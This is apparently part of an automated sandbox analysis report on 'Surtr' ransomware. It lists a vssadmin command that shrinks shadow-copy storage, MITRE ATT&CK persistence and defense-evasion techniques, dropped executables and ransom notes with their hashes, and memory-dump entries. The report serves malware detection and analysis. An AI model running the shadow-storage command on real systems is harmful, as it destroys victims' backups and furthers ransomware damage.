C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=W:\ /on=W:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Scheduled Task
1Hidden Files and Directories
1Defense Evasion
Bypass User Account Control
1Disabling Security Tools
1Modify Registry
2Indicator Removal on Host
1File Deletion
2Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.htaFilesize
8KB
MD553dab3a3443e1439e53220aff1e7490f
SHA14222d1841951b87cd54516d3381f8358791fd988
SHA256ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA5125ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.txtFilesize
621B
MD5edb2c94c58363c1d8e428506e28d669f
SHA150041c9b823d76a932788d553b07cc25297a0ff7
SHA256428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc
SHA512024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\ProgramData\Service\ID_DATA.surtFilesize
14B
MD5db84d0324aeb1f2a9c496b293adef33d
SHA179bc8117faef8c4f2273358b43c1280f0e70deea
SHA2569c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab
SHA512e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407
-
C:\ProgramData\Service\Private_DATA.surtFilesize
1KB
MD599a04b59f115e55249d7323a446446df
SHA1942399e4cb0d49fcf386b352f5bbc9f4ce4ae832
SHA256af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3
SHA51225a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d
-
C:\ProgramData\Service\Public_DATA.surtFilesize
204B
MD507c7fc3eb4a68e9e968c0a7e22fb1092
SHA19d3804e00636a82d6d74812d6c6a4dcecaf5ef5d
SHA2560f880c9481db083d9872faec40139e2a2b99eeae1fa98717634a51b84aeeb99b
SHA51260d1a7f2620b526bec9378962566966deb53238a22610d5a728a0118d8f6ca2153c69dca6dedd87248f967736b1c31329adc07c930e5ccac467436d264eb580f
-
C:\ProgramData\Service\SURTR_README.htaFilesize
8KB
MD553dab3a3443e1439e53220aff1e7490f
SHA14222d1841951b87cd54516d3381f8358791fd988
SHA256ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA5125ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
-
C:\ProgramData\Service\SURTR_README.txtFilesize
621B
MD5edb2c94c58363c1d8e428506e28d669f
SHA150041c9b823d76a932788d553b07cc25297a0ff7
SHA256428ad5fade332e703436d51e6b11ab06fad9e57089088b99e9b53372351b6efc
SHA512024fd02ed3327cd59c6f1cbe24786f27852278d67354c5edf2e5acb1f58bbf0aa1d8114cbdd0b02904f98c5f02393c1f3887a924e6fdb4e75b53db29ff50ed1a
-
C:\ProgramData\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\ProgramData\Service\SurtrBackGround.jpgFilesize
30KB
MD533f7fc301be9d39fcb474fb8b1e5f42e
SHA1a3bf9ddb2ac53bc4b12b249825189a7c7a07b766
SHA25699cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03
SHA5126cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00
-
C:\ProgramData\Service\SurtrIcon.icoFilesize
78KB
MD53257eb22824b57fe3d58074bca3128d3
SHA16f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97
SHA2565afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad
SHA5127b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d
-
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surtFilesize
14B
MD5db84d0324aeb1f2a9c496b293adef33d
SHA179bc8117faef8c4f2273358b43c1280f0e70deea
SHA2569c41ce9bd8f0cb76d508a6a5d81ddb65524ff158028ec13c0d93cbb22dcf91ab
SHA512e12798d4a2260cc0bc09853359434813a1103b1517537e4129b9dcc06674b26359bb5815db56b04e2ef44667ab686618a164d7243e0ac609c6b62ddb88e3f407
-
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surtFilesize
1KB
MD599a04b59f115e55249d7323a446446df
SHA1942399e4cb0d49fcf386b352f5bbc9f4ce4ae832
SHA256af9eb20d3ce3aa9fc78c257c5b7c3e77c5d812d99a870283cf6970a7b2bfd3e3
SHA51225a11ce27c1b15f0df3eb1c91ff04b095297d4a2ab14f6e681b68b60855e8d0386892a5bf6580db212484277c6d7aa4b3fedeeb74298f97cdd41b327a6bba22d
-
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.htaFilesize
8KB
MD553dab3a3443e1439e53220aff1e7490f
SHA14222d1841951b87cd54516d3381f8358791fd988
SHA256ca61149d672c2c233a8927ae1e50471cb69449992b3e13c7c74398bd17f5b8c4
SHA5125ef1be8a904ef4dc47576574b709a72f060357a5ea6b2e7cc16f4be8f7197a142da7f7a61583fa20012986ea008b53f08eda2a985ef45de47b5eb3eaf40e82f5
-
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exeFilesize
320KB
MD5e6fc190168519d6a6c4f1519e9450f0f
SHA1af2080ddf1064fb80c7b9af942aaabf264441098
SHA2568199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA5124522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
-
memory/268-198-0x0000026F41838000-0x0000026F41840000-memory.dmpFilesize
32KB
-
memory/344-157-0x0000000000000000-mapping.dmp
-
memory/576-151-0x0000000000000000-mapping.dmp
-
memory/592-141-0x0000000000000000-mapping.dmp
-
memory/608-153-0x0000000000000000-mapping.dmp
-
memory/664-140-0x0000000000000000-mapping.dmp
-
memory/772-123-0x0000000000000000-mapping.dmp
-
memory/1068-154-0x0000000000000000-mapping.dmp
-
memory/1136-149-0x0000000000000000-mapping.dmp
-
memory/1176-142-0x0000000000000000-mapping.dmp
-
memory/1184-122-0x0000000000000000-mapping.dmp
-
memory/1220-177-0x0000000000000000-mapping.dmp
-
memory/1252-147-0x0000000000000000-mapping.dmp
-
memory/1264-143-0x0000000000000000-mapping.dmp
-
memory/1320-138-0x0000000000000000-mapping.dmp
-
memory/1336-137-0x0000000000000000-mapping.dmp
-
memory/1372-155-0x0000000000000000-mapping.dmp
-
memory/1380-159-0x0000000000000000-mapping.dmp
-
memory/1472-134-0x0000000000000000-mapping.dmp
-
memory/1520-124-0x0000000000000000-mapping.dmp
-
memory/1612-160-0x0000000000000000-mapping.dmp
-
memory/1616-139-0x0000000000000000-mapping.dmp
-
memory/1732-125-0x0000000000000000-mapping.dmp
-
memory/1780-162-0x0000000000000000-mapping.dmp
-
memory/1932-171-0x0000000000000000-mapping.dmp
-
memory/1964-161-0x0000000000000000-mapping.dmp
-
memory/2060-164-0x0000000000000000-mapping.dmp
-
memory/2080-166-0x0000000000000000-mapping.dmp
-
memory/2156-176-0x0000000000000000-mapping.dmp
-
memory/2180-168-0x0000000000000000-mapping.dmp
-
memory/2228-169-0x0000000000000000-mapping.dmp
-
memory/2260-121-0x0000000000000000-mapping.dmp
-
memory/2332-119-0x0000000000000000-mapping.dmp
-
memory/2332-180-0x0000000000000000-mapping.dmp
-
memory/2392-145-0x0000000000000000-mapping.dmp
-
memory/2456-170-0x0000000000000000-mapping.dmp
-
memory/2488-158-0x0000000000000000-mapping.dmp
-
memory/2552-146-0x0000000000000000-mapping.dmp
-
memory/2568-144-0x0000000000000000-mapping.dmp
-
memory/2600-136-0x0000000000000000-mapping.dmp
-
memory/2684-179-0x0000000000000000-mapping.dmp
-
memory/2696-178-0x0000000000000000-mapping.dmp
-
memory/2716-156-0x0000000000000000-mapping.dmp
-
memory/2772-133-0x0000000000000000-mapping.dmp
-
memory/2784-135-0x0000000000000000-mapping.dmp
-
memory/3028-148-0x0000000000000000-mapping.dmp
-
memory/3060-126-0x0000000000000000-mapping.dmp
-
memory/3324-173-0x0000000000000000-mapping.dmp
-
memory/3344-131-0x0000000000000000-mapping.dmp
-
memory/3444-172-0x0000000000000000-mapping.dmp
-
memory/3520-129-0x0000000000000000-mapping.dmp
-
memory/3640-132-0x0000000000000000-mapping.dmp
-
memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/3680-117-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/3680-116-0x0000000140133F50-mapping.dmp
-
memory/3680-115-0x0000000140000000-0x0000000140136000-memory.dmpFilesize
1.2MB
-
memory/3684-152-0x0000000000000000-mapping.dmp
-
memory/3700-175-0x0000000000000000-mapping.dmp
-
memory/3744-127-0x0000000000000000-mapping.dmp
-
memory/3788-181-0x0000000000000000-mapping.dmp
-
memory/3920-130-0x0000000000000000-mapping.dmp
-
memory/3968-174-0x0000000000000000-mapping.dmp
-
memory/3984-128-0x0000000000000000-mapping.dmp
-
memory/4004-150-0x0000000000000000-mapping.dmp
-
memory/4016-163-0x0000000000000000-mapping.dmp
-
memory/4020-165-0x0000000000000000-mapping.dmp
-
memory/4032-120-0x0000000000000000-mapping.dmp
-
memory/4052-167-0x0000000000000000-mapping.dmp